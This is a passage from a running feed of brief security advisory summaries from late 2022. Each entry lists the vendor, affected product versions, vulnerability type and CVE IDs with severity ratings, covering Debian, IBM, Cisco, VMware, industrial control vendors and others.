Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-40150 (high), CVE-2022-45685 (High), CVE-2022-45693 (High),
CVE-2022-37601 (Critical), CVE-2022-45939 (High), CVE-2022-4515 (Critical), CVE-2022-4337
(Medium), CVE-2022-4338 (Medium), CVE-2020-8813 (High), CVE-2020-23226 (Medium),
CVE-2020-25706 (Medium), CVE-2022-0730 (Critical), CVE-2022-46169 (Critical)
Debian has released a security update to resolve vulnerability in the libcommons-net-java
package, which may lead to leakage of information about services running on the private
network of the client.
CVE ID: CVE-2021-37533 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Fuji Electric has released security updates to address out of bounds read and out of bounds
write vulnerabilities in Fuji Electric V-SFT and TELLUS which can cause information
disclosure and/or arbitrary code execution. The affected products are V-SFT v6.1.7.0 and
earlier, and TELLUS v4.0.12.0 and earlier.
CVE ID: CVE-2022-46360, CVE-2022-43448
Fuji Electric has released security update to address stack-based buffer overflow, out of
bounds read and out of bounds write vulnerabilities in Fuji Electric V-Server which can
cause information disclosure and/or arbitrary code execution. The affected products are
V-Server v4.0.12.0 and earlier.
CVE ID: CVE-2022-47908, CVE-2022-41645, CVE-2022-47317
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-1199 (High), CVE-2022-3202 (High), CVE-2022-3541 (High),
CVE-2022-38177 (High), CVE-2022-38178 (High), CVE-2022-0865 (Medium), CVE-2022-0891 (High),
CVE-2022-1056 (Medium), CVE-2021-33621 (High), CVE-2021-4028 (High), CVE-2021-4204
(High)
ABB has released security updates to resolve a vulnerability in ABB products that may cause
the product to stop, make the product inaccessible, take remote control of the product, or
insert and run arbitrary code. The affected products are Infinity DC Power Plant – H5692448
G104 G842 G224L G630-4 G451C(2) G461(2) – comcode 150047415, and Pulsar Plus System
Controller – NE843_S – comcode 150042936.
CVE ID: CVE-2022-1607 (Medium)
Foxit has released an updated Foxit PhantomPDF 10.1.10 to resolve multiple vulnerabilities
in Foxit PhantomPDF 10.1.9.37808 and earlier versions.
CVE ID: CVE-2022-43637, CVE-2022-43638, CVE-2022-43639, CVE-2022-43640,
CVE-2022-43641, CVE-2022-32774, CVE-2022-38097, CVE-2022-37332, CVE-2022-40129
Debian has released a security update to resolve multiple vulnerabilities in the mbedtls
package, which can allow attackers to obtain sensitive information like the RSA private key
or may cause Denial of Service (DoS).
CVE ID: CVE-2019-16910 (Medium), CVE-2019-18222 (Medium), CVE-2020-10932 (Medium),
CVE-2020-10941 (Medium), CVE-2020-16150 (Medium), CVE-2020-36421 (Medium), CVE-2020-36422
(Medium), CVE-2020-36423 (High), CVE-2020-36424 (Medium), CVE-2020-36425 (Medium),
CVE-2020-36426 (High), CVE-2020-36475 (High), CVE-2020-36476 (High), CVE-2020-36478 (High),
CVE-2021-24119 (Medium), CVE-2021-43666 (High), CVE-2021-44732 (Critical), CVE-2022-35409
(Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to resolve an integer overflow vulnerability in
libksba package, which can result in Denial of Service (DoS) or the execution of arbitrary
code.
CVE ID: CVE-2022-47629
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-31693 (Medium), CVE-2021-46784 (Medium), CVE-2022-2938 (High),
CVE-2022-31630 (High), CVE-2022-3165 (Medium), CVE-2022-3545 (High), CVE-2022-3564 (High),
CVE-2022-3705 (High), CVE-2022-3920 (High), CVE-2022-42252 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Synology has released security updates to address multiple vulnerabilities in Synology
Router Manager (SRM) that allow remote attackers to execute arbitrary commands, conduct
Denial of Service (DoS) attacks, or read arbitrary files. The affected versions are SRM 1.3,
and SRM 1.2.
A vulnerability due to use of password hash with insufficient computational effort has been
discovered in Priva's equipment- TopControl Suite, that can allow to obtain login
credentials and access to the product remotely. The affected components are Bacnet prior to
8.7.8.0, Blue ID prior to 8.7.8.0, Compass prior to 8.7.8.0, Connect prior to 8.7.8.0, and
TPC prior to 8.7.8.0.
CVE ID: CVE-2022-3010 (High)
An improper access control vulnerability has been discovered in Rockwell Automation's
Equipment- Studio 5000 Logix Emulate that can allow a malicious user to perform Remote Code
Execution (RCE), potentially impacting the confidentiality, integrity, and availability of
the software. The affected versions are Studio 5000 Logix Emulate v20 to v33.
CVE ID: CVE-2022-3156 (High)
Omron has released a security update to address an out of bounds write vulnerability in
CX-Programmer which can allow arbitrary code execution or loss of sensitive information if a
user opens a specially crafted CX-P file. The affected versions are CX-Programmer 9.78 and
prior.
CVE ID: CVE-2022-43509 (High)
Juniper Networks has released security updates to address an improper input validation
vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS
Evolved, that can cause a Denial of Service (DoS). The affected versions are Junos OS
version 22.3R1, and Junos OS Evolved version 22.3R1-EVO.
CVE ID: CVE-2022-22184 (High)
Foxit has released an updated Foxit PDF Editor 11.2.4 to resolve multiple vulnerabilities in
Foxit PDF Editor 11.2.3.53593 and all previous 11.x versions, 10.1.9.37808 and earlier.
A Denial of Service (DoS) vulnerability has been discovered in Mitsubishi Electric's
equipment- the MELSEC iQ-R, iQ-L series CPU modules and MELIPC series. The affected models
are MELSEC iQ-R Series model R00/01/02CPU firmware versions "32" & prior, model
R04/08/16/32/120(EN)CPU firmware versions "65" & prior, model R08/16/32/120SFCPU & model
R12CCPU-V, all versions, MELSEC iQ-L Series model L04/08/16/32HCPU, all versions and MELIPC
Series MI5122-VW, all versions.
CVE ID: CVE-2022-33324 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Zyxel has released security update to resolve DNS misconfiguration in the NBG7510 home
router that allow an unauthenticated attacker to perform DNS-related attacks by using the
open DNS resolver when the device is switched to the AP mode.
CVE ID: CVE-2022-38546 (Medium)
It has been discovered that the installers generated by Squirrel.Windows can insecurely load
Dynamic Link Libraries (DLLs) that may cause arbitrary code execution. The affected versions
are installers generated by Squirrel.Windows 2.0.1 and earlier.
CVE ID: CVE-2022-46330 (High)
+Message App has released security updates to address a vulnerability caused by improper
handling of Unicode control characters in its products. The affected versions are +Message
App for Android prior to version 12.9.5, prior to version 54.49.0500 & prior to version
3.9.2 and +Message App for iOS prior to version 3.9.4.
CVE ID: CVE-2022-43543 (Medium)
Mozilla has released a security update to address a vulnerability in Thunderbird 102.6.1. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-46874 (Medium)
Fuji Electric has released security updates to resolve out of bounds write and stack-based
buffer overflow vulnerabilities in Tellus Lite V-Simulator that can allow to execute
arbitrary code. The affected versions are Fuji Electric Tellus Lite V-Simulator 4.0.12.0 and
prior.
CVE ID: CVE-2022-3087 (High), CVE-2022-3085 (High)
Rockwell Automation has released security updates to address an improper input validation
vulnerability in its equipment- GuardLogix, ControlLogix, Compact Logix, and Compact
GaurdLogix controllers that can allow a malformed CIP request to cause a major
nonrecoverable fault and a Denial of Service (DoS) condition.
CVE ID: CVE-2022-3157 (High)
ARC Informatique has released security updates to address vulnerabilities that allow
cleartext storage of sensitive information and insertion of sensitive information into Log
File in its PcVue equipment. Successful exploitation can allow access to the email account,
SIM card, and other data sources associated with the affected device. The affected versions
are PcVue 15 through 15.2.2 and PcVue 8.10 through 15.2.3.
CVE ID: CVE-2022-4312 (Medium), CVE-2022-4311 (Medium)
Multiple vulnerabilities such as Cross Site Scripting (XSS) and improper restriction of
rendered UI layers or frames have been discovered in Rockwell Automation equipment,
MicroLogix 1100 and 1400 that can cause Denial of Service (DoS) condition or allow for
Remote Code Execution (RCE). The affected versions are all versions of MicroLogix 1100,
MicroLogix 1400 A 7.000 and prior, and MicroLogix 1400 B/C 21.007 and prior.
CVE ID: CVE-2022-46670 (High), CVE-2022-3166 (High)
Delta Industrial Automation has released security updates to address a command injection
vulnerability in the 4G Router DX-3021 that allows adding files, deleting files, or changing
file permissions. The affected versions are DX-3021L9 versions prior to V1.24.
CVE ID: CVE-2022-4616 (High)
A new exploitation method has been discovered that uses CVE-2022-41080 and CVE-2022-41082 to
achieve Remote Code Execution (RCE) through Outlook Web Access.
The method bypasses URL rewrite mitigations for the Autodiscover endpoint provided by
Microsoft in response to ProxyNotShell.
Citrix has released security updates to address multiple vulnerabilities in Citrix
Hypervisor that allows a privileged user in a guest VM to cause the host to become
unresponsive or crash. The affected product is Citrix Hypervisor 8.2 LTSR CU1.
CVE ID: CVE-2022-3643 (Critical), CVE-2022-42328 (Medium), CVE-2022-42329
(Medium)
Red Hat has released Red Hat Advanced Cluster Security for Kubernetes (RHACS) 3.73.1 to
resolve multiple bugs in RHACS 3.73.0. The affected products are Red Hat Advanced Cluster
Security for Kubernetes 3 x86_64.
NVIDIA has released a firmware security update for NVIDIA DGX A100 server and NVIDIA DGX
Station A100 to address multiple vulnerabilities that can lead to code execution, Denial of
Service (DoS), information disclosure, escalation of privileges, loss of data integrity, or
data tampering.
CVE ID: CVE-2022-42271 (High), CVE-2022-42280 (High), CVE-2022-42281 (Medium),
CVE-2022-42288 (Medium)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2017-12240 (Critical), CVE-2017-12235 (High), CVE-2017-12237 (High),
CVE-2017-12232 (High), CVE-2017-6627 (Medium)
Hikvision has released security updates to address an access control vulnerability in
Hikvision wireless bridge products, which can be used to obtain admin permissions. The
affected products are DS-3WF0AC-2NT below V1.1.0, and DS-3WF01C-2N/O below V1.0.4.
CVE ID: CVE-2022-28173 (Critical)
Prosys OPC has released security updates to address insufficiently protected credentials
vulnerability in UA Simulation Server, UA Modbus Server. The affected products are Prosys
OPC UA Simulation Server 5.3.0 and earlier, and Prosys OPC UA Modbus Server 1.4.18 and
earlier.
CVE ID: CVE-2022-2967 (Medium)
Ubuntu has released security updates to address a use-after-free vulnerability in Linux
kernel. An attacker can exploit this vulnerability to take control of an affected system.
The affected product is Ubuntu 22.04 LTS.
CVE ID: CVE-2022-42896 (Medium)
VMware has released security updates to address privilege escalation and access control
vulnerabilities in VMware vRealize Operations (vROps).
CVE ID: CVE-2022-31707 (High), CVE-2022-31708 (Medium)
Samba has released security updates to address multiple vulnerabilities in its products. All
versions of Samba prior to 4.15.13, 4.16.8, 4.17.4 are affected.
CVE ID: CVE-2022-38023 (High), CVE-2022-37966 (High), CVE-2022-37967 (High),
CVE-2022-45141 (High), CVE-2022-42898
SHARP has released security updates to address a command injection vulnerability in SHARP
Multifunctional Products (MFP). Successful exploitation can allow an arbitrary command to be
executed on the affected MFP firmware.
CVE ID: CVE-2022-45796 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-42898 (Medium), CVE-2022-40750 (Medium), CVE-2022-39353 (Critical),
CVE-2022-3515 (Critical), CVE-2022-21619 (Low), CVE-2022-21624 (Low), CVE-2022-21626
(Medium), CVE-2022-39399 (Low), CVE-2022-21624 (Low), CVE-2022-40159 (High), CVE-2022-40160
(High), CVE-2022-35255 (High), CVE-2022-34917 (High), CVE-2022-37434 (High), CVE-2022-42004
(Medium), CVE-2022-40154 (Medium)
Debian has released security updates to address multiple vulnerabilities in php7.3,
firefox-esr, and libde265. An attacker can exploit these vulnerabilities to take control of
an affected system.
CVE ID: CVE-2021-21707 (Medium), CVE-2022-31625 (High), CVE-2022-31626 (High),
CVE-2022-31628 (Medium), CVE-2022-31629 (Medium), CVE-2022-37454 (Critical), CVE-2022-46872,
CVE-2022-46874, CVE-2022-46878, CVE-2022-46880, CVE-2022-46881, CVE-2022-46882 (Medium),
CVE-2020-21599 (Medium), CVE-2021-35452 (Medium), CVE-2021-36408 (Medium), CVE-2021-36409
(High), CVE-2021-36410 (Medium), CVE-2021-36411 (Medium)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-3872 (High), CVE-2022-39328 (High), CVE-2022-3970 (Critical),
CVE-2022-43945 (High), CVE-2022-2827 (High), CVE-2022-40242 (Critical), CVE-2022-40259
(Critical), CVE-2014-0144 (High), CVE-2021-3671 (Medium), CVE-2022-39306 (High),
CVE-2022-39307 (Medium), CVE-2022-31690 (High), CVE-2022-31692 (Critical)
Trend Micro has released security updates to resolve multiple vulnerabilities in Trend Micro
Apex One and Apex One as a Service.
CVE ID: CVE-2022-45797 (High), CVE-2022-45798 (High)
Weidmueller Interface has released security update to address a JavaScript injection
vulnerability in its XML editing system SCHEMA ST4 online help.
CVE ID: CVE-2022-3073 (Medium)
CODESYS has released security updates to address multiple vulnerabilities in several CODESYS
products.
CVE ID: CVE-2022-22508 (Medium), CVE-2022-4048 (High), CVE-2022-31805 (Critical),
CVE-2022-31806 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-41880 (Medium), CVE-2022-41900 (High), CVE-2022-39353 (Critical),
CVE-2022-21626 (Medium), CVE-2022-42889 (Critical), CVE-2022-37616 (Critical),
CVE-2022-42003 (Medium), CVE-2022-36067 (Critical), CVE-2022-42004 (Medium), CVE-2022-41854
(Medium), CVE-2022-25168 (High), CVE-2021-37404 (Critical), CVE-2022-1552 (High),
CVE-2022-23806 (High), CVE-2018-8023 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-45939 (High), CVE-2022-3524 (High), CVE-2022-3619 (Medium),
CVE-2022-3628 (Medium), CVE-2022-42895 (Medium), CVE-2022-42896, CVE-2022-43945,
CVE-2022-42703, CVE-2022-3524, CVE-2022-3564, CVE-2022-3565, CVE-2022-3566, CVE-2022-3567,
CVE-2022-3594, CVE-2022-3621, CVE-2022-46341, CVE-2022-46342, CVE-2022-46340, CVE-2022-4283,
CVE-2022-46344, CVE-2022-46343
Drupal has released security updates to resolve access bypass and Remote Code Execution
(RCE) vulnerabilities in File (Field) Paths and H5P - Create and Share Rich Content &
Applications projects respectively, a third-party libraries used in it.
Google has released Beta channel 109.0.5414.41 (Platform version: 15236.35.0) for most
ChromeOS devices, Beta channel 109.0.5414.46 for Windows, Mac and Linux, Chrome Beta 109
(109.0.5414.46) for iOS, Chrome Beta 109 (109.0.5414.44) for Android and LTS channel
102.0.5005.193 (Platform Version: 14695.166.0) for most ChromeOS devices to resolve multiple
vulnerabilities.
CVE ID: CVE-2022-4178 (High), CVE-2022-4179 (High), CVE-2022-4181 (High),
CVE-2022-4135 (High)
NETGEAR has released a security update to address multiple vulnerabilities in RAX30. The
affected versions are RAX30 1.0.9.92.
CVE ID: CVE-2021-44141 (Medium), CVE-2022-0778 (High)
Debian has released a security update to resolve multiple vulnerabilities in Git package
that can cause execution of arbitrary commands, leak information from the local filesystem
and can bypass restricted shell.
CVE ID: CVE-2022-24765 (High), CVE-2022-29187 (High), CVE-2022-39253, CVE-2022-39260
(High)
OpenSSL has released security updates to address policy constraints double locking
vulnerability in its products. The affected versions are OpenSSL 3.0.0 to 3.0.7.
CVE ID: CVE-2022-3996 (High)
SonicWall has released security updates to address an arbitrary file deletion vulnerability
in Sonicwall Capture Client via SentinelOne Agent that can cause escalate privileges
escalation and can delete files. The affected versions are versions before SentinelOne Agent
for Windows 22.3.
Microsoft has released security updates to address multiple vulnerabilities in its products.
An attacker can exploit these vulnerabilities to take control of an affected system.
Redmine has released a security update to address a cross-site scripting vulnerability in
it. All versions of Redmine are affected.
CVE ID: CVE-2022-44637 (Medium)
Apple has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit some of these vulnerabilities to take control of an affected device.
CVE ID: CVE-2022-46693, CVE-2022-46692, CVE-2022-46698, CVE-2022-42867,
CVE-2022-46691, CVE-2022-46692, CVE-2022-42852, CVE-2022-46696, CVE-2022-46700,
CVE-2022-46698, CVE-2022-46699, CVE-2022-42863, CVE-2022-42856
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
102.6, Firefox ESR 102.6, and Firefox 108. An attacker can exploit these vulnerabilities to
take control of an affected system.
CVE ID: CVE-2022-46880 (High), CVE-2022-46872 (High), CVE-2022-46881 (High),
CVE-2022-46874 (Medium), CVE-2022-46875 (Medium), CVE-2022-46882 (Medium), CVE-2022-46878
(High), CVE-2022-46879 (High), CVE-2022-46877 (Low), CVE-2022-46873 (Medium)
Cisco has released a security update to address an Unauthorized File Access vulnerability in
Cisco Identity Services Engine (ISE). The affected versions are Cisco ISE 3.1, 3.2, and 3.0
and earlier.
CVE ID: CVE-2022-20822 (High)
Dell has released security updates to address multiple vulnerabilities in Dell PowerScale
OneFS that can be exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-45100 (High), CVE-2022-45099 (High), CVE-2022-45101 (High),
CVE-2022-45095 (Medium), CVE-2022-45097 (Medium), CVE-2022-45098 (Medium), CVE-2022-45096
(Medium)
Google has released Chrome 108 (108.0.5359.128) for Android, Stable channel 108.0.5359.124
for Mac and Linux and 108.0.5359.124/.125 for Windows, and Chrome Stable 108
(108.0.5359.112) for iOS.
CVE ID: CVE-2022-4436 (High), CVE-2022-4437 (High), CVE-2022-4438 (High),
CVE-2022-4439 (High), CVE-2022-4440 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to address a global buffer overflow vulnerability
in pngcheck that can result in the execution of arbitrary code.
CVE ID: CVE-2020-35511 (High)
Mitsubishi Electric's has released security updates to resolve path transversal
vulnerability in the project management function of GENESIS64. The affected versions are
GENESIS64TM 10.97 to 10.97.2.
CVE ID: CVE-2022-40264 (Medium)
Schneider Electric has released security updates to resolve multiple vulnerabilities in its
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Citrix has released security updates to address a critical remote arbitrary code execution
vulnerability in Citrix ADC and Citrix Gateway. The affected products are Citrix ADC and
Citrix Gateway 13.0 before 13.0-58.32, Citrix ADC
and Citrix Gateway 12.1 before 12.1-65.25, Citrix ADC 12.1-FIPS before 12.1-55.291
and Citrix ADC 12.1-NDcPP before 12.1-55.291.
CVE ID: CVE-2022-27518 (Critical)
VMware has released security updates to address multiple vulnerabilities in VMware Workspace
ONE Access and Identity Manager, VMware vRealize Network Insight (vRNI), and VMware ESXi,
Workstation, and Fusion.
CVE ID: CVE-2022-31705 (Critical), CVE-2022-31700 (High), CVE-2022-31701
(Medium), CVE-2022-31702 (Critical), CVE-2022-31703 (High)
Contec has released a security update to address an OS command injection vulnerability it
its equipment- CONPROSYS HMI System (CHS). Successful exploitation can allow to send
specially crafted requests that can execute commands on the server. The affected versions
are CONPROSYS HMI System (CHS) 3.4.4 and prior.
CVE ID: CVE-2022-44456 (Critical)
Schneider Electric has released security updates to resolve multiple vulnerabilities in APC
Easy UPS Online Monitoring Software. The affected versions are APC Easy UPS Online
Monitoring Software V2.5-GA and prior, and V2.5-GA-01-22261 and prior.
CVE ID: CVE-2022-42970 (Critical), CVE-2022-42971 (Critical), CVE-2022-42972 (High),
CVE-2022-42973 (High)
Ubuntu has released security updates to address several vulnerabilities in Pillow, Vim and
Containerd packages that allows to take control of an affected system.
CVE ID: CVE-2022-24303 (Critical), CVE-2022-45198 (High), CVE-2022-23471 (Medium),
CVE-2022-31030 (Medium), CVE-2022-24769 (Medium), CVE-2022-24778 (High)
SAP has released security updates to address several vulnerabilities affecting multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-41267 (Critical), CVE-2022-41272 (Critical), CVE-2022-42889
(Critical), CVE-2022-41271 (Critical)
HP has released security updates to resolve escalation of privilege, arbitrary code
execution, and information disclosure vulnerabilities in HP Security Manager.
CVE ID: CVE-2022-46358 (High), CVE-2022-46357 (High), CVE-2022-46359 (High),
CVE-2022-46356 (High), CVE-2020-15522 (Medium)
A vulnerability has been discovered in IFM Moneo Appliance that allows to reset the
administrator password by only supplying the serial number. The affected versions are IFM
Moneo Appliance 1.9.3 and below.
CVE ID: CVE-2022-3485 (Critical)
It has been discovered that SQLite, when relying on --safe for execution of an untrusted CLI
script, does not properly implement the azProhibitedFunctions protection mechanism, and
instead allows UDF functions such as WRITEFILE. The affected versions are SQLite through
3.40.0.
CVE ID: CVE-2022-46908 (Critical)
A vulnerability has been discovered in a GitHub repository that allows for the exposure of
sensitive information. The affected versions are GitHub repository eventsource/eventsource
prior to v2.0.2
CVE ID: CVE-2022-1650 (Critical)
Fortinet has released security updates to address a heap-based buffer overflow vulnerability
in FortiOS SSL-VPN that allow to execute arbitrary code or commands via specifically crafted
requests.
CVE ID: CVE-2022-42475 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-39353 (Critical)
Ubuntu has released security updates to address multiple vulnerabilities in Squid. An
attacker can exploit these vulnerabilities to take control of an affected system. The
affected product is Ubuntu 16.04 ESM.
CVE ID: CVE-2016-2569 (High), CVE-2016-2570 (High), CVE-2016-2571 (High),
CVE-2016-3948 (High), CVE-2018-1000024 (High), CVE-2018-1000027 (High)
Debian has released security update to address an information leak vulnerability in
node-eventsource. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-1650 (Critical)
A stored cross-site scripting vulnerability has been discovered in the Admin Smart Search
feature in Proofpoint Enterprise Protection (PPS/PoD). The affected version are Admin Smart
Search 8.19.0 and below.
CVE ID: CVE-2022-46332 (Critical)
Intel has released security updates to address multiple OpenSSL related vulnerabilities in
its products.
CVE ID: CVE-2022-3602 (High), CVE-2022-3786 (High)
Google has released LTC-108 108.0.5359.75 (Platform Version: 15183.59.0) for most ChromeOS
devices, Dev channel OS version: 15269.0.0, Browser version: 110.0.5447.0 for most ChromeOS
devices, and Dev channel 110.0.5464.2 for Windows, Mac and Linux.
Buffalo has released security updates to address multiple vulnerabilities in its products.
CVE ID: CVE-2022-43466 (Medium), CVE-2022-43443 (Medium), CVE-2022-43486
(Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-35515 (Medium), CVE-2021-35516 (High), CVE-2021-35517 (Medium),
CVE-2021-36090 (High)
A privilege escalation vulnerability in VMware Tools affects BIG-IP and BIG-IQ of F5. A
local, non-administrative attacker can gain elevated privileges on the Guest OS system,
which might affect the confidentiality and integrity of the system.
Multiple vulnerabilities such as arbitrary code execution and unauthorized access have been
discovered in AMI MegaRAC SP-X Baseboard Management Controller affecting Lenovo
products. AMI has released AMI MegaRAC SP-X Baseboard Management Controller (BMC) security
enhancements to address these vulnerabilities.
CVE ID: CVE-2022-40259 (High), CVE-2022-40242 (High), CVE-2022-2827
(High)
Advantech has released security update to address a SQL Injection vulnerability in its
equipment- iView. Successful exploitation of this vulnerability can allow an attacker to
acquire credentials. The affected versions are Advantech iView management software
5.7.04.6469 and prior.
CVE ID: CVE-2022-3323 (High)
AVEVA has released security update to address a Relative Path Traversal vulnerability in its
equipment- InTouch Access Anywhere. Successful exploitation of this vulnerability can allow
an unauthenticated user to read files on the system. The affected versions are AVEVA InTouch
Access Anywhere 2020 R2 and older.
CVE ID: CVE-2022-23854 (High)
Rockwell Automation has released security updates to address an Improper Input Validation
vulnerability in its equipment- CompactLogix, Compact GuardLogix, ControlLogix, and
GuardLogix controllers. Successful exploitation of this vulnerability can allow an
unauthorized user to cause denial-of-service condition on a targeted device.
CVE ID: CVE-2022-3752 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2017-11671 (Medium), CVE-2022-1941 (High), CVE-2015-5237 (High),
CVE-2022-45061 (High), CVE-2022-45061 (High), CVE-2022-37454 (Critical), CVE-2016-10228
(Medium), CVE-2019-25013 (Medium), CVE-2020-27618 (Medium), CVE-2017-12132
(Medium)
Cisco has released security update to resolve an insufficient input validation vulnerability
in the Cisco Discovery Protocol processing feature of Cisco IP Phone 7800 and 8800 Series
firmware. The affected versions are IP Phone 7800 Series, and IP Phone 8800 Series (except
Cisco Wireless IP Phone 8821).
CVE ID: CVE-2022-20968 (High)
VMware has released a security updates to address multiple vulnerabilities in VMware ESXi,
VMware vCenter Server (vCenter Server), and VMware Cloud Foundation (Cloud Foundation).
CVE ID: CVE-2022-31696 (High), CVE-2022-31697 (Medium), CVE-2022-31698 (Medium),
CVE-2022-31699 (Medium)
Google has released Beta channel 109.0.5414.36 for Windows, Mac and Linux, Chrome Dev 110
(110.0.5462.3) for Android, Chrome Beta 109 (109.0.5414.33) for iOS, and Chrome Beta 109
(109.0.5414.34) for Android.
Huawei has released a security update to address a denial of service vulnerability in the
Wi-Fi module of the HUAWEI Smart WiFi Router. The affected version is HUAWEI WS7100-20 Smart
WiFi Router.
CVE ID: CVE-2022-46740 (Medium)
GitLab has released Community Edition and Enterprise Edition version 15.5.6 to resolve a
number of regressions and bugs in 15.5 release and prior versions.
A vulnerability has been discovered in Markdown Preview Enhanced for VSCode and Atom that
allows to execute arbitrary commands during the GFM export process. The affected versions
are Markdown Preview Enhanced v0.6.5 and v0.19.6.
CVE ID: CVE-2022-45026 (Critical)
A command injection vulnerability via the PDF file import function has been discovered in
Markdown Preview Enhanced for VSCode and Atom that allows to execute arbitrary commands
during the GFM export process. The affected versions are Markdown Preview Enhanced v0.6.5
and v0.19.6.
CVE ID: CVE-2022-45025 (Critical)
A SQL injection vulnerability has been discovered in Simple Phone Book/Directory Web App.
The affected version is Simple Phone Book/Directory Web App v1.0.
CVE ID: CVE-2022-45010 (Critical)
An unsafe evaluation of user controlled input vulnerability has been discovered in pdfmake.
The affected versions are pdfmake 0.2.5 and below.
CVE ID: CVE-2022-46161 (Critical)
A vulnerability has been discovered in the Web Client component of TIBCO Software Inc that
allows to exploit an open redirect on the affected system. The affected version is TIBCO
Software Inc.'s TIBCO Nimbus 10.5.0.
CVE ID: CVE-2022-41559 (Critical)
An authentication-bypass vulnerability has been discovered in Mega System Technologies Inc
MSNSwitch. The affected version is Mega System Technologies Inc MSNSwitch MNT.2408.
CVE ID: CVE-2022-32429 (Critical)
A vulnerability has been discovered in Open Web Analytics (OWA) that allows to obtain
sensitive user information, which can be used to gain admin privileges by leveraging cache
hashes. The affected versions are Open Web Analytics before 1.7.4.
CVE ID: CVE-2022-24637 (Critical)
Wireshark has released security updates to address a memory exhaustion vulnerability in
Kafka dissector. The affected versions are Wireshark 4.0.0 to 4.0.1, 3.6.0 to 3.6.9.
Android has released a security bulletin to resolve multiple vulnerabilities affecting
several Android devices. Security patch levels of 2022-12-05 or later, address all of these
issues.
Access bypass vulnerability has been discovered in Entity Registration, a third-party
library used by Drupal. The affected versions are Entity Registration 7.1.0 and below 7.1.9.
The updates are available.
A privilege escalation vulnerability has been discovered in Ivanti EPM that allows to
execute commands with elevated privileges.
CVE ID: CVE-2022-27773 (Critical)
A vulnerability has been discovered in firewall rule which allows all incoming TCP
connections to all programs from any source and to all ports that are created in Windows
Firewall after Zabbix agent installation (MSI).
CVE ID: CVE-2022-43516 (Critical)
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-46682 (High), CVE-2022-46683 (Medium), CVE-2022-46684 (High),
CVE-2022-46685 (Medium), CVE-2022-46686 (High), CVE-2022-46687 (High), CVE-2022-46688
(Medium)
Google has released Stable channel 108.0.5359.98 for Mac and Linux and 108.0.5359.98/.99 for
Windows, and Extended Stable channel 108.0.5359.99 for Windows and 108.0.5359.98 for Mac.
An arbitrary file upload vulnerability has been discovered in YITH WooCommerce Gift Cards
premium plugin for WordPress. The affected versions are YITH WooCommerce Gift Cards premium
plugin 3.19.0 and below.
CVE ID: CVE-2022-45359 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in simple-git package. The
affected versions are simple-git before 3.15.0.
CVE ID: CVE-2022-25912 (Critical)
A Remote Code Execution (RCE) vulnerability due to improper user input validation has been
discovered in gitpython package. All versions of gitpython package are affected.
CVE ID: CVE-2022-24439 (Critical)
A Denial of Service (DoS) vulnerability has been discovered in MobaXterm. The affected
versions are MobaXterm before v22.1.
CVE ID: CVE-2022-38337 (Critical)
An improper authentication vulnerability has been discovered in Veeam Backup for Google
Cloud v1.0 and v3.0 that allows attackers to bypass authentication mechanisms.
CVE ID: CVE-2022-43549 (Critical)
Debian has released security updates to address multiple vulnerabilities in node-log4js,
node-json-schema, and ruby-rails-html-sanitizer. An attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-21704 (Medium), CVE-2021-3918 (Critical), CVE-2022-32209
(Medium)
Ubuntu has released security updates to address multiple vulnerabilities in NumPy package.
An attacker can exploit these vulnerabilities to take control of an affected system. The
affected products are Ubuntu 22.10 Ubuntu 22.04 LTS and Ubuntu 20.04 LTS.
CVE ID: CVE-2021-33430 (Medium), CVE-2021-34141 (Medium), CVE-2021-41495 (Medium),
CVE-2021-41496 (Medium)
Cacti has released security update to address a command injection vulnerability that allows
an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific
data source is selected for any monitored device.
CVE ID: CVE-2022-46169 (Critical)
An out-of-bounds read vulnerability has been discovered in the snmp process of Mikrotik
